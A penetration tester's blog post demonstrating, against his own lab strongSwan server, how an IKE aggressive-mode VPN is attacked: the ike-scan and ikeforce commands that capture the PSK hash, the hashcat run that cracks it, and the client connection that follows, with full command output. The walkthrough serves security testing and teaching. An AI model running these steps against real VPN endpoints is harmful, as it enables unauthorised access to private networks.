IKE Aggressive Mode VPN – ike-scan + ikeforce

As I've seen it on more than a few engagements, I wanted to show attacking IKE aggressive mode VPNs.

IKE Aggressive Mode - Introduction

First, I recommend looking at my previous post if you want to see how I setup this VPN initially.

I've obtained access to a few networks via this attack, and it's always something worth checking.

For more examples, you can check out the SpiderLabs series on this attack as well.

Enabling Aggressive Mode

I had to enable aggressive mode on my VPN server before performing the attack.

First, I added the very specific charon rule to my strongswan.conf.

root@ubuntu-vpn:~# cat /etc/strongswan.conf 
# strongswan.conf - strongSwan configuration file
#
# Refer to the strongswan.conf(5) manpage for details
#
# Configuration changes should be made in the included files


charon {
    load_modular = yes
    plugins {
        include strongswan.d/charon/*.conf
    }
}


charon.i_dont_care_about_security_and_use_aggressive_mode_psk=yes


include strongswan.d/*.conf

Next, I added the PSK to my ipsec.secrets file.

root@ubuntu-vpn:~# cat /etc/ipsec.secrets 
# This file holds shared secrets or RSA private keys for authentication.


# RSA private key for this host, authenticating it to any other host
# which knows the public part.


: RSA "server-key.pem"
: PSK "passw0rd"

I also added a new connection in my ipsec.conf file, to support the PSK authentication.

root@ubuntu-vpn:~# cat /etc/ipsec.conf
config setup
    charondebug="ike 1, knl 1, cfg 0"
    uniqueids=no

conn ikev2-vpn
    auto=add
    compress=no
    type=tunnel
    keyexchange=ikev2
    fragmentation=yes
    forceencaps=yes

    ike=aes256-sha1-modp1024,aes128-sha1-modp1024,3des-sha1-modp1024! 
    esp=aes256-sha256,aes256-sha1,3des-sha1!

    dpdaction=clear
    dpdelay=300s
    rekey=no

    left=%any
    leftid=138.197.x.x
    leftcert=server-cert.pem
    leftsendcert=always
    leftsubnet=0.0.0.0/0

    right=%any
    rightid=%any
    rightauth=eap-mschapv2
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    rightsendcert=never

    eap_identity=%identity

conn ipsec
    keyexchange=ikev1
    authby=xauthpsk
    xauth=server
    aggressive=yes
    left=%defaultroute
    leftsubnet=0.0.0.0/0
    leftfirewall=yes
    right=%any
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    auto=add

As a fun note, strongSwan changes its name to 'weakSwan' when you enable aggressive mode.

root@ubuntu-vpn:~# service strongswan restart
root@ubuntu-vpn:~# service strongswan status
● strongswan.service - strongSwan IPsec IKEv1/IKEv2 daemon using ipsec.conf
   Loaded: loaded (/lib/systemd/system/strongswan.service; enabled; vendor preset: enabled)
   Active: active (running) since Mon 2019-05-13 00:51:07 UTC; 2s ago
 Main PID: 3773 (starter)
    Tasks: 18 (limit: 1146)
   Memory: 6.0M
   CGroup: /system.slice/strongswan.service
           ├─3773 /usr/lib/ipsec/starter --daemon charon --nofork
           └─3797 /usr/lib/ipsec/charon --debug-ike 1 --debug-knl 1 --debug-cfg 0


May 13 00:51:07 ubuntu-vpn systemd[1]: Started strongSwan IPsec IKEv1/IKEv2 daemon using ipsec.conf.
May 13 00:51:07 ubuntu-vpn ipsec[3773]: Starting weakSwan 5.7.1 IPsec [starter]...
May 13 00:51:07 ubuntu-vpn ipsec_starter[3773]: Starting weakSwan 5.7.1 IPsec [starter]...
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[DMN] Starting IKE charon daemon (strongSwan 5.7.1, Linux 5.0.0-13-generic, x86_64)
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[LIB] plugin 'load-tester': failed to load - load_tester_plugin_create returned NULL
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[LIB] loaded plugins: charon test-vectors unbound ldap pkcs11 tpm aesni aes rc2 sha2 sha1 md4 md5 mgf1 rdrand random nonce x509 revocation constraints acert pubkey pkcs1 pkcs7 pkcs8 pkcs12 pgp dn
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[LIB] dropped capabilities, running as uid 0, gid 0
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[JOB] spawning 16 worker threads
May 13 00:51:07 ubuntu-vpn ipsec[3773]: charon (3797) started after 100 ms
May 13 00:51:07 ubuntu-vpn ipsec_starter[3773]: charon (3797) started after 100 ms

Fixing Connection Issues

Unfortunately, I was running into some NO_PROPOSAL_CHOSEN errors when I tried to connect.

This looked like the issues I had with the initial setup, so I added specific ike and esp proposals to my ipsec.conf file. I also removed the ikev2-vpn connection, as I would not be using it for this demonstration.

root@ubuntu-vpn:~# cat /etc/ipsec.conf
config setup
    charondebug="ike 1, knl 1, cfg 0"
    uniqueids=no

conn ipsec
    keyexchange=ikev1
    authby=xauthpsk
    aggressive=yes

    ike=aes256-sha1-modp1024,aes128-sha1-modp1024,3des-sha1-modp1024! 
    esp=aes256-sha256,aes256-sha1,3des-sha1!

    left=%any
    leftid=138.197.x.x
    leftsubnet=0.0.0.0/0
    leftfirewall=yes

    right=%any
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    auto=add

The service restarted just fine, and my config changes seemed to work.

root@ubuntu-vpn:~# service strongswan restart
root@ubuntu-vpn:~# service strongswan status
● strongswan.service - strongSwan IPsec IKEv1/IKEv2 daemon using ipsec.conf
   Loaded: loaded (/lib/systemd/system/strongswan.service; enabled; vendor preset: enabled)
   Active: active (running) since Mon 2019-05-13 00:55:49 UTC; 9s ago
 Main PID: 3890 (starter)
    Tasks: 18 (limit: 1146)
   Memory: 6.0M
   CGroup: /system.slice/strongswan.service
           ├─3890 /usr/lib/ipsec/starter --daemon charon --nofork
           └─3914 /usr/lib/ipsec/charon --debug-ike 1 --debug-knl 1 --debug-cfg 0

IKE Aggressive Mode - Obtaining the Hash

First, I used ike-scan to verify that the target supported aggressive mode.

root@kali:~/tools/ike-scan# sudo ike-scan -M -A 138.197.x.x --id=test --sport=5001
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
138.197.x.x Aggressive Mode Handshake returned
    HDR=(CKY-R=bd604ebe989abc87)
    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(32 bytes)
    ID(Type=ID_IPV4_ADDR, Value=138.197.x.x)
    VID=09002689dfd6b712 (XAUTH)
    VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
    Hash(20 bytes)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.119 seconds (8.39 hosts/sec).  1 returned handshake; 0 returned notify

Next, I ran ikeforce to try and obtain the group ID. Note that I received an invalid transform error from this attempt.

root@kali:~/tools/ikeforce# sudo python ikeforce.py 138.197.x.x -e -w groupnames_shodan.txt --sport=5001
[+]Program started in Enumeration Mode
[+]Checking for possible enumeration techniques
Analyzing initial response. Please wait, this can take up to 15 seconds...
[-] Invalid Transform Set selected. Run the tool again with the -a flag to enumerate all accepted AM transform sets
Shutting down server

I reran ikeforce with the '-a' flag to enumerate the accepted transforms.

root@kali:~/tools/ikeforce# sudo python ikeforce.py 138.197.x.x -a --sport=5001
[+]Program started in Transform Set Enumeration Mode
[+]Checking for acceptable Transforms

============================================================================================
Accepted (AM) Transform Sets
============================================================================================
| 5 : 3DES-CBC | 2 : SHA | 1 : PSK | 2 : alternate 1024-bit MODP group |
--------------------------------------------------------------------------------------------
============================================================================================
Shutting down server

Finally, I ran ike-scan again, with the valid transformations, and an ID of 'groupid'. Note that this normally requires a valid group ID to return a valid hash. That said, I was unable to set an actual group ID with strongSwan, so any ID would have returned a valid hash! This should have to do with the rightid parameter for ipsec.conf, but I couldn't get it to work.

root@kali:~/tools/ikeforce# sudo ike-scan 138.197.x.x -M -A --trans=5,2,1,2 --id=groupid --sport=5001 -Phash
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
138.197.x.x Aggressive Mode Handshake returned
    HDR=(CKY-R=8b67013d65acf933)
    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(32 bytes)
    ID(Type=ID_IPV4_ADDR, Value=138.197.x.x)
    VID=09002689dfd6b712 (XAUTH)
    VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
    Hash(20 bytes)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.097 seconds (10.33 hosts/sec).  1 returned handshake; 0 returned notify
root@kali:~/tools/ikeforce# cat hash 
8b657880ebb6a2554268c554a2683825f988a91c6b518f47376fb685da7df1377721d82bcdd3130dda9e6e8bc7422f440bc1cc8b2e8b1a25678c390e6da3024ce27ce1c4499663ac8d49ffc44c85dd075556b2b9c5ce7d8f974067020650479de058f60f220d16bd99226f483060941f5278384fcc5accf266c004e985ed06de:8133f3f6fa7a2b815065df68722a702c14ace7c1c1b7729887dae1f756763916950fc10437d990058de35ca83b8519de7e65eb3a59747aa7a53b36e209494db19ade19df70950b29f6d0c889e7aeba04410cdac12aa29a6810947c257614579491db0e5245746ca4da15d40b19e01e9d4fc0d942dd7f15b033316f1c39254c63:8b67013d65acf933:64cd9d94a862dadd:00000001000000010000002c01010001000000240101000080010005800200028003000180040002800b0001000c000400007080:010000008ac5ddda:85a15a301e9889dd116ca5d4a0ea35fed5c550ff:efe8f24573b2a8b7645c4ece0c323630430daa3e25e550504255d6efa4a7c087:464debaea25c7d6e20237317cbf33187a9d71e6c

Cracking the Hash

After obtaining the aggressive mode hash, I cracked it using hashcat mode 5400. As you can see, I successfully recovered the PSK of 'passw0rd'.

root@kali:~/tools/ikeforce# hashcat -d2,3 -m 5400 -r ~/tools/cracking/best64.rule hash ~/tools/cracking/rockyou.txt
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104517568
* Runtime...: 1 sec

8b657880ebb6a2554268c554a2683825f988a91c6b518f47376fb685da7df1377721d82bcdd3130dda9e6e8bc7422f440bc1cc8b2e8b1a25678c390e6da3024ce27ce1c4499663ac8d49ffc44c85dd075556b2b9c5ce7d8f974067020650479de058f60f220d16bd99226f483060941f5278384fcc5accf266c004e985ed06de:8133f3f6fa7a2b815065df68722a702c14ace7c1c1b7729887dae1f756763916950fc10437d990058de35ca83b8519de7e65eb3a59747aa7a53b36e209494db19ade19df70950b29f6d0c889e7aeba04410cdac12aa29a6810947c257614579491db0e5245746ca4da15d40b19e01e9d4fc0d942dd7f15b033316f1c39254c63:8b67013d65acf933:64cd9d94a862dadd:00000001000000010000002c01010001000000240101000080010005800200028003000180040002800b0001000c000400007080010000008ac5ddda:85a15a301e9889dd116ca5d4a0ea35fed5c550ff:efe8f24573b2a8b7645c4ece0c323630430daa3e25e550504255d6efa4a7c087:464debaea25c7d6e20237317cbf33187a9d71e6c:passw0rd
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: IKE-PSK SHA1
Hash.Target......: 8b657880ebb6a2554268c554a2683825f988a91c6b518f47376...d71e6c
Time.Started.....: Mon May 20 08:47:38 2019 (0 secs)
Time.Estimated...: Mon May 20 08:47:38 2019 (0 secs)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:   541.4 kH/s (7.74ms) @ Accel:1 Loops:1 Thr:256 Vec:1
Speed.Dev.#3.....:        0 H/s (0.00ms) @ Accel:16 Loops:2 Thr:256 Vec:1
Speed.Dev.#*.....:   541.4 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6144/1104517568 (0.00%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456 -> horoscope
Candidates.#3....: [Copying]

Started: Mon May 20 08:47:35 2019
Stopped: Mon May 20 08:47:39 2019

Connecting

With the cracked PSK in hand, it was time to connect to the server!

Unfortunately, I received a few errors, and was unable to intially connect.

First, I needed to update the xauth and authby parameters for my ipsec.conf file. Note that the 'xauthby=alwaysok' should allow me to authenticate with any XAUTH values, and only the PSK. That said, I was unable to get this to work in practice.

root@ubuntu-vpn:~# cat /etc/ipsec.conf
config setup
    protostack=netkey
    charondebug="ike 1, knl 1, cfg 0"
    uniqueids=no

conn ipsec
    keyexchange=ikev1
    authby=xauthpsk
    xauth=server
    xauthby=alwaysok
    aggressive=yes
    lifetime=10800s

    ike=aes256-sha1-modp1024,aes128-sha1-modp1024,3des-sha1-modp1024! 
    esp=aes256-sha256,aes256-sha1,3des-sha1!

    left=%any
    leftid=138.197.x.x
    leftsubnet=0.0.0.0/0
    leftfirewall=yes
    leftxauthserver=yes

    right=%any
    rightxauthclient=yes
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    auto=add

For another example of this configuration, you can visit the following post.

With the changes in place, I was finally able to authenticate using charon. I did have to use valid credentials for the user@target.com account, and add them to my ipsec.secrets file.

root@kali:~/ike# charon-cmd --host 138.197.x.x --identity user@target.com --profile ikev1-xauth-psk-am --ike-proposal aes256-sha1-modp1024 --esp-proposal aes256-sha256
00[LIB] dropped capabilities, running as uid 0, gid 0
00[DMN] Starting charon-cmd IKE client (strongSwan 5.8.0, Linux 5.2.0-kali2-amd64, x86_64)
00[LIB] loaded plugins: charon-cmd aesni aes rc2 sha2 sha1 md5 mgf1 random nonce x509 revocation constraints pubkey pkcs1 pkcs7 pkcs8 pkcs12 sshkey pem openssl fips-prf gmp agent xcbc hmac gcm kernel-netlink resolve socket-default bypass-lan eap-identity eap-md5 eap-gtc eap-mschapv2 eap-tls eap-ttls xauth-generic
00[JOB] spawning 16 worker threads
05[IKE] installed bypass policy for 172.16.8.0/24
06[IKE] initiating Aggressive Mode IKE_SA cmd[1] to 138.197.x.x
05[KNL] received netlink error: Invalid argument (22)
05[KNL] unable to install source route for %any6
05[IKE] installed bypass policy for ::1/128
05[IKE] installed bypass policy for fe80::/64
06[ENC] generating AGGRESSIVE request 0 [ SA KE No ID V V V V V ]
06[NET] sending packet: from 172.16.x.x[42802] to 138.197.x.x[4500] (371 bytes)
08[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[42802] (412 bytes)
08[ENC] parsed AGGRESSIVE response 0 [ SA KE No ID V V V V NAT-D NAT-D HASH ]
08[IKE] received XAuth vendor ID
08[IKE] received DPD vendor ID
08[IKE] received FRAGMENTATION vendor ID
08[IKE] received NAT-T (RFC 3947) vendor ID
08[CFG] selected proposal: IKE:AES_CBC_256/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
Preshared Key: 
08[IKE] local host is behind NAT, sending keep alives
08[ENC] generating AGGRESSIVE request 0 [ HASH NAT-D NAT-D ]
08[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (108 bytes)
09[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (76 bytes)
09[ENC] parsed TRANSACTION request 3467891452 [ HASH CPRQ(X_USER X_PWD) ]
EAP password: 
09[ENC] generating TRANSACTION response 3467891452 [ HASH CPRP(X_USER X_PWD) ]
09[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (92 bytes)
10[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (76 bytes)
10[ENC] parsed TRANSACTION request 3167944879 [ HASH CPS(X_STATUS) ]
10[IKE] XAuth authentication of 'user@target.com' (myself) successful
10[IKE] IKE_SA cmd[1] established between 172.16.x.x[user@target.com]...138.197.x.x[138.197.x.x]
10[IKE] scheduling rekeying in 35627s
10[IKE] maximum IKE_SA lifetime 36227s
10[ENC] generating TRANSACTION response 3167944879 [ HASH CPA(X_STATUS) ]
10[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (76 bytes)
10[ENC] generating TRANSACTION request 3232408269 [ HASH CPRQ(ADDR DNS) ]
10[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (76 bytes)
11[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (92 bytes)
11[ENC] parsed TRANSACTION response 3232408269 [ HASH CPRP(ADDR DNS DNS) ]
11[IKE] installing DNS server 8.8.8.8 to /etc/resolv.conf
11[IKE] installing DNS server 8.8.4.4 to /etc/resolv.conf
11[IKE] installing new virtual IP 10.10.10.1
11[ENC] generating QUICK_MODE request 2050222642 [ HASH SA No ID ID ]
11[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (172 bytes)
12[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (172 bytes)
12[ENC] parsed QUICK_MODE response 2050222642 [ HASH SA No ID ID ]
12[CFG] selected proposal: ESP:AES_CBC_256/HMAC_SHA2_256_128/NO_EXT_SEQ
12[IKE] CHILD_SA cmd{1} established with SPIs c3f6d869_i cfd35ad3_o and TS 10.10.10.1/32 === 0.0.0.0/0
12[ENC] generating QUICK_MODE request 2050222642 [ HASH ]
12[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (60 bytes)

I validated that the VPN connection was working by pulling down an IP address from my attacking box.

root@kali:~/ike# curl http://ipinfo.io/ip
138.197.x.x

IKE Aggressive Mode - Conclusion

While it took awhile to get this post out, I'm glad that I finally finished.

IKE aggressive mode is an often overlooked attack vector, but it can easily lead to an external compromise.

I'll leave cracking XAUTH up to the reader for now, but maybe I'll add a third blog post in this series eventually!

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

2 Comments

Filed under Security Not Included

2 Responses to IKE Aggressive Mode VPN – ike-scan + ikeforce

  1. john

    Is there any tool similar to ikeforce? As I don’t think trustwave/spiderlabs are going to implement or upgrade it to a python3 version. Sadly nobody has forked this project yet..

    It really is the only ‘go to’ tool for proper vpn enumeration / research..
    In saying that, I do find

    https://github.com/isaudits/scripts/blob/master/iker.py

    is very useful for collecting preliminary info although it does’t help when trying to figure out the groupid :/

    • I’ve only used ikeforce in the past, so I’m not sure offhand.

      Yea, iker is nice but doesn’t help for groupid fairly often. That said, just updating ikeforce to Python3 would likely be easy, I just haven’t looked into it.

      Unfortunately, I don’t know of any other tools offhand.

Leave a Reply

Your email address will not be published. Required fields are marked *

ERROR: si-captcha.php plugin: GD image support not detected in PHP!

Contact your web host and ask them to enable GD image support for PHP.

ERROR: si-captcha.php plugin: imagepng function not detected in PHP!

Contact your web host and ask them to enable imagepng for PHP.

This site uses Akismet to reduce spam. Learn how your comment data is processed.